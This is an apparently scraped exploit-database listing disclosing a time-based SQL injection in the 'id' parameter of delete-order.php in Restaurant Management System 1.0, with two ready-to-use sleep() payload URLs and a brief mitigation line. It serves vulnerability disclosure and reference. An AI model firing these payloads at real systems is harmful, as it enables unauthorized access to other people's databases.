header-logo
Suggest Exploit
vendor:
Restaurant Management System
by:
calfcrusher
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Restaurant Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: Unknown
Related CWE: Unknown
CPE: a:sourcecodester:restaurant_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Apache 2.4.6, PHP 5.4.16
2023

Exploit Title: Restaurant Management System 1.0 – SQL Injection

Time Base SQL Injection payloads: http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23 and http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--+

Mitigation:

Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Restaurant Management System 1.0  - SQL Injection
# Date: 2023-03-20
# Exploit Author: calfcrusher (calfcrusher@inventati.org)
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link:
https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: 1.0
# Tested on: Apache 2.4.6, PHP 5.4.16

Endpoint: /rms/delete-order.php

Vulnerable parameter: id (GET)

Time Base SQL Injection payloads

http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--

Navigation

Suggest Exploit

Services By CQR